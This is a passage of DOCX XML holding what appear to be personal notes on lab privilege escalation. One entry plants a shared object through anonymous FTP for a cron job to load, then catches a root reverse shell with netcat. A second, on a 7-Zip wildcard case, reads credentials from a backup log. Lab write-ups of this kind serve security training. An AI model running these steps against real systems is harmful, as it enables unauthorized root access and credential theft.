        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a Netcat handler to catch our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002500">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll upload our shared object to the anonymous FTP service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002501">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ ftp 192.168.120.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002502">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to 192.168.120.217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002503">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">220 (vsFTPd 3.0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002504">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name (192.168.120.217:kali): anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002505">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002506">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002507">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002508">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002509">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; passive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive mode on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">250 Directory successfully changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000250F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local: utils.so remote: utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002510">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">227 Entering Passive Mode (192,168,120,217,39,107).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002511">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">150 Ok to send data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002513">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">476 bytes sent in 0.00 secs (6.6757 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002514">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; bye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002515">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">221 Goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002516">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002517">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll move our payload into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002518">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /var/ftp/pub/utils.so /usr/local/lib/dev/utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002519">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we'll wait for the cron job to execute, load our payload send us our reverse root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.120.217: inverse host lookup failed: Unknown host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect to [kali] from (UNKNOWN) [192.168.120.217] 48416</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000251F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002520">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002521">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002522">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002523">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002524">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002525">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qh07b5qjshtc" w:id="325"/>
      <w:bookmarkEnd w:id="325"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7zip wildcard PE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002526">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002527">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId783">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zipper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice we had a cron job that run a bash file with these lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002528">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password=`cat /root/secret`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html/uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm *.tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7za a /opt/backups/backup.zip -p$password -tzip *.zip &gt; /opt/backups/backup.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000252F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I don't really understand the attack fully, but all we had to do was see that the output from the 7z command was put into</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/backups/backup.log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so we just looked there and found credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002530">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002531">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
